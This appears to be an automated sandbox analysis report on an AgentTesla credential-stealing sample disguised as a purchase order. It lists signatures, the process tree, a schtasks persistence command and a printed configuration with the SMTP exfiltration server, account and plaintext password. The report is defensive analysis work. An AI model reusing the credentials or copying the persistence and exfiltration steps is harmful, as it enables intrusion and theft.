Play interactive tour

Edit tour

Analysis Report PO #047428.exe

Overview

General Information

Sample Name:	PO #047428.exe
Analysis ID:	344916
MD5:	747ce85eef93567c5676649aef9c00b8
SHA1:	99cb598151f63f464ed92c3e42749721cbc9091b
SHA256:	bc445fd5e14be52b529f507908767c8cf463d49b0b3353923bc308e64da81bda
Tags:	AgentTesla
Most interesting Screenshot:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected AgentTesla

Yara detected AntiVM_3

.NET source code contains potential unpacker

.NET source code contains very large array initializations

C2 URLs / IPs found in malware configuration

Contains functionality to register a low level keyboard hook

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Installs a global keyboard hook

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies the hosts file

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file access)

Uses schtasks.exe or at.exe to add and modify task schedules

Antivirus or Machine Learning detection for unpacked file

Contains capabilities to detect virtual machines

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses SMTP (mail sending)

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Startup

System is w10x64

PO #047428.exe (PID: 4616 cmdline: 'C:\Users\user\Desktop\PO #047428.exe' MD5: 747CE85EEF93567C5676649AEF9C00B8)

schtasks.exe (PID: 6220 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yXAQfeQN' /XML 'C:\Users\user\AppData\Local\Temp\tmpA80C.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 6228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PO #047428.exe (PID: 6268 cmdline: {path} MD5: 747CE85EEF93567C5676649AEF9C00B8)

kprUEGC.exe (PID: 5548 cmdline: 'C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe' MD5: 747CE85EEF93567C5676649AEF9C00B8)

schtasks.exe (PID: 6112 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yXAQfeQN' /XML 'C:\Users\user\AppData\Local\Temp\tmp3604.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

kprUEGC.exe (PID: 6212 cmdline: {path} MD5: 747CE85EEF93567C5676649AEF9C00B8)

kprUEGC.exe (PID: 6276 cmdline: {path} MD5: 747CE85EEF93567C5676649AEF9C00B8)

kprUEGC.exe (PID: 5472 cmdline: 'C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe' MD5: 747CE85EEF93567C5676649AEF9C00B8)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "dTWvMR5lNHU", "URL: ": "https://H7QA9fZzbgw.org", "To: ": "accountant@sharqcapital.qa", "ByHost: ": "mail.sharqcapital.qa:587", "Password: ": "oN028UYPxH", "From: ": "accountant@sharqcapital.qa"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.256271000.0000000003DF5000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000013.00000002.619723039.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.619632627.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000E.00000002.338811978.0000000004807000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.624912957.0000000003081000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000013.00000002.624776782.0000000003021000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: kprUEGC.exe PID: 6276	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: kprUEGC.exe PID: 6276	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: kprUEGC.exe PID: 5548	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: PO #047428.exe PID: 4616	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: PO #047428.exe PID: 4616	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: PO #047428.exe PID: 6268	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: PO #047428.exe PID: 6268	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 8 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.PO #047428.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
19.2.kprUEGC.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Sigma Overview

System Summary:

Sigma detected: Scheduled temp file as task from temp location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yXAQfeQN' /XML 'C:\Users\user\AppData\Local\Temp\tmpA80C.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yXAQfeQN' /XML 'C:\Users\user\AppData\Local\Temp\tmpA80C.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\PO #047428.exe' , ParentImage: C:\Users\user\Desktop\PO #047428.exe, ParentProcessId: 4616, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yXAQfeQN' /XML 'C:\Users\user\AppData\Local\Temp\tmpA80C.tmp', ProcessId: 6220

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: kprUEGC.exe.6276.19.memstr

Malware Configuration Extractor: Agenttesla {"Username: ": "dTWvMR5lNHU", "URL: ": "https://H7QA9fZzbgw.org", "To: ": "accountant@sharqcapital.qa", "ByHost: ": "mail.sharqcapital.qa:587", "Password: ": "oN028UYPxH", "From: ": "accountant@sharqcapital.qa"}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	ReversingLabs: Detection: 30%
Source: C:\Users\user\AppData\Roaming\yXAQfeQN.exe	ReversingLabs: Detection: 30%

Multi AV Scanner detection for submitted file

Show sources

Source: PO #047428.exe	Virustotal: Detection: 56%			Perma Link
Source: PO #047428.exe	ReversingLabs: Detection: 30%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\yXAQfeQN.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: PO #047428.exe

Joe Sandbox ML: detected

Source: 4.2.PO #047428.exe.400000.0.unpack	Avira: Label: TR/Spy.Gen8
Source: 19.2.kprUEGC.exe.400000.0.unpack	Avira: Label: TR/Spy.Gen8

Compliance:

Uses 32bit PE files

Show sources

Source: PO #047428.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Contains modern PE file flags such as dynamic base (ASLR) or NX

Show sources

Source: PO #047428.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.5:49732 -> 104.156.59.2:587
Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.5:49745 -> 104.156.59.2:587

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://H7QA9fZzbgw.org

Source: global traffic

TCP traffic: 192.168.2.5:49732 -> 104.156.59.2:587

Source: Joe Sandbox View

ASN Name: HVC-ASUS HVC-ASUS

Source: global traffic

TCP traffic: 192.168.2.5:49732 -> 104.156.59.2:587

Source: unknown

DNS traffic detected: queries for: mail.sharqcapital.qa

Source: PO #047428.exe, 00000004.00000002.624912957.0000000003081000.00000004.00000001.sdmp, kprUEGC.exe, 00000013.00000002.624776782.0000000003021000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: kprUEGC.exe, 00000013.00000002.624776782.0000000003021000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: kprUEGC.exe, 00000013.00000002.624776782.0000000003021000.00000004.00000001.sdmp	String found in binary or memory: http://YpMPnj.com
Source: PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: PO #047428.exe, 00000004.00000002.627066309.00000000033A2000.00000004.00000001.sdmp, kprUEGC.exe, 00000013.00000002.627191703.000000000337F000.00000004.00000001.sdmp	String found in binary or memory: http://mail.sharqcapital.qa
Source: PO #047428.exe, 00000000.00000002.254592778.0000000002AE1000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.334527728.0000000003440000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: kprUEGC.exe, 00000013.00000002.627166996.0000000003377000.00000004.00000001.sdmp, kprUEGC.exe, 00000013.00000002.627191703.000000000337F000.00000004.00000001.sdmp, kprUEGC.exe, 00000013.00000002.627217105.000000000338B000.00000004.00000001.sdmp, kprUEGC.exe, 00000013.00000002.624776782.0000000003021000.00000004.00000001.sdmp	String found in binary or memory: https://H7QA9fZzbgw.org
Source: kprUEGC.exe, 00000013.00000002.624776782.0000000003021000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%
Source: PO #047428.exe, 00000004.00000002.624912957.0000000003081000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%$
Source: kprUEGC.exe, 00000013.00000002.624776782.0000000003021000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: PO #047428.exe, 00000000.00000002.256271000.0000000003DF5000.00000004.00000001.sdmp, PO #047428.exe, 00000004.00000002.619632627.0000000000402000.00000040.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.338811978.0000000004807000.00000004.00000001.sdmp, kprUEGC.exe, 00000013.00000002.619723039.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: PO #047428.exe, 00000004.00000002.624912957.0000000003081000.00000004.00000001.sdmp, kprUEGC.exe, 00000013.00000002.624776782.0000000003021000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to register a low level keyboard hook

Show sources

Source: C:\Users\user\Desktop\PO #047428.exe

Code function: 4_2_015FA238 SetWindowsHookExW 0000000D,00000000,?,?

4_2_015FA238

Installs a global keyboard hook

Show sources

Source: C:\Users\user\Desktop\PO #047428.exe	Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\PO #047428.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe			Jump to behavior

Source: PO #047428.exe, 00000000.00000002.254308202.0000000000FB0000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Users\user\Desktop\PO #047428.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior

Spam, unwanted Advertisements and Ransom Demands:

Modifies the hosts file

Show sources

Source: C:\Users\user\Desktop\PO #047428.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

System Summary:

.NET source code contains very large array initializations

Show sources

Source: 4.2.PO #047428.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bE7342097u002d7B9Au002d4F55u002dBE5Eu002d5B1EF7279126u007d/u00343C78CE7u002d3C19u002d4367u002d90E9u002d0EA91ECF4BC2.cs	Large array initialization: .cctor: array initializer size 11966
Source: 19.2.kprUEGC.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bE7342097u002d7B9Au002d4F55u002dBE5Eu002d5B1EF7279126u007d/u00343C78CE7u002d3C19u002d4367u002d90E9u002d0EA91ECF4BC2.cs	Large array initialization: .cctor: array initializer size 11966

Source: C:\Users\user\Desktop\PO #047428.exe	Code function: 0_2_00F8C434	0_2_00F8C434
Source: C:\Users\user\Desktop\PO #047428.exe	Code function: 0_2_00F8E798	0_2_00F8E798
Source: C:\Users\user\Desktop\PO #047428.exe	Code function: 0_2_00F8E792	0_2_00F8E792
Source: C:\Users\user\Desktop\PO #047428.exe	Code function: 4_2_015FC110	4_2_015FC110
Source: C:\Users\user\Desktop\PO #047428.exe	Code function: 4_2_015F95F0	4_2_015F95F0
Source: C:\Users\user\Desktop\PO #047428.exe	Code function: 4_2_015F9070	4_2_015F9070
Source: C:\Users\user\Desktop\PO #047428.exe	Code function: 4_2_015F5F80	4_2_015F5F80
Source: C:\Users\user\Desktop\PO #047428.exe	Code function: 4_2_015F13A8	4_2_015F13A8
Source: C:\Users\user\Desktop\PO #047428.exe	Code function: 4_2_015F67C0	4_2_015F67C0
Source: C:\Users\user\Desktop\PO #047428.exe	Code function: 4_2_015F66C0	4_2_015F66C0
Source: C:\Users\user\Desktop\PO #047428.exe	Code function: 4_2_017047A0	4_2_017047A0
Source: C:\Users\user\Desktop\PO #047428.exe	Code function: 4_2_01703CCC	4_2_01703CCC
Source: C:\Users\user\Desktop\PO #047428.exe	Code function: 4_2_01704730	4_2_01704730
Source: C:\Users\user\Desktop\PO #047428.exe	Code function: 4_2_01704710	4_2_01704710
Source: C:\Users\user\Desktop\PO #047428.exe	Code function: 4_2_01705472	4_2_01705472
Source: C:\Users\user\Desktop\PO #047428.exe	Code function: 4_2_062D6C60	4_2_062D6C60
Source: C:\Users\user\Desktop\PO #047428.exe	Code function: 4_2_062D94F0	4_2_062D94F0
Source: C:\Users\user\Desktop\PO #047428.exe	Code function: 4_2_062D7530	4_2_062D7530
Source: C:\Users\user\Desktop\PO #047428.exe	Code function: 4_2_062D6918	4_2_062D6918
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Code function: 14_2_07436DD1	14_2_07436DD1
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Code function: 14_2_07432FAE	14_2_07432FAE
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Code function: 14_2_07436DF2	14_2_07436DF2
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Code function: 14_2_07433434	14_2_07433434
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Code function: 19_2_010DC928	19_2_010DC928
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Code function: 19_2_010D6780	19_2_010D6780
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Code function: 19_2_010D79A0	19_2_010D79A0
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Code function: 19_2_015947A0	19_2_015947A0
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Code function: 19_2_01594730	19_2_01594730
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Code function: 19_2_015946B0	19_2_015946B0
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Code function: 19_2_0159D840	19_2_0159D840
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Code function: 19_2_01678F40	19_2_01678F40
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Code function: 19_2_0167BFD8	19_2_0167BFD8
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Code function: 19_2_01671278	19_2_01671278
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Code function: 19_2_01675E50	19_2_01675E50
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Code function: 19_2_01676590	19_2_01676590
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Code function: 19_2_0167EFC0	19_2_0167EFC0
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Code function: 19_2_01676690	19_2_01676690

Source: PO #047428.exe	Binary or memory string: OriginalFilename vs PO #047428.exe
Source: PO #047428.exe, 00000000.00000002.256271000.0000000003DF5000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAssemblyReferenceEntry.exeD vs PO #047428.exe
Source: PO #047428.exe, 00000000.00000002.256271000.0000000003DF5000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameTTZSLBIqNvSVQsvCDYwwXcppoxTlZdCwa.exe4 vs PO #047428.exe
Source: PO #047428.exe, 00000000.00000002.264791623.0000000008B30000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs PO #047428.exe
Source: PO #047428.exe, 00000000.00000002.264839720.0000000008B80000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs PO #047428.exe
Source: PO #047428.exe, 00000000.00000002.264839720.0000000008B80000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs PO #047428.exe
Source: PO #047428.exe, 00000000.00000002.254308202.0000000000FB0000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs PO #047428.exe
Source: PO #047428.exe, 00000004.00000002.620863919.0000000001138000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs PO #047428.exe
Source: PO #047428.exe, 00000004.00000000.252766943.0000000000D7E000.00000002.00020000.sdmp	Binary or memory string: OriginalFilename vs PO #047428.exe
Source: PO #047428.exe, 00000004.00000002.619632627.0000000000402000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameTTZSLBIqNvSVQsvCDYwwXcppoxTlZdCwa.exe4 vs PO #047428.exe
Source: PO #047428.exe, 00000004.00000002.622806031.0000000001570000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs PO #047428.exe
Source: PO #047428.exe	Binary or memory string: OriginalFilename vs PO #047428.exe

Source: PO #047428.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: PO #047428.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: yXAQfeQN.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: kprUEGC.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: 4.2.PO #047428.exe.400000.0.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 4.2.PO #047428.exe.400000.0.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 19.2.kprUEGC.exe.400000.0.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 19.2.kprUEGC.exe.400000.0.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.adwa.spyw.evad.winEXE@15/9@2/1

Source: C:\Users\user\Desktop\PO #047428.exe

File created: C:\Users\user\AppData\Roaming\yXAQfeQN.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Mutant created: \Sessions\1\BaseNamedObjects\GSxfhxjHrTuj
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:716:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6228:120:WilError_01

Source: C:\Users\user\Desktop\PO #047428.exe

File created: C:\Users\user\AppData\Local\Temp\tmpA80C.tmp

Jump to behavior

Source: PO #047428.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\PO #047428.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\Desktop\PO #047428.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\PO #047428.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\PO #047428.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\PO #047428.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

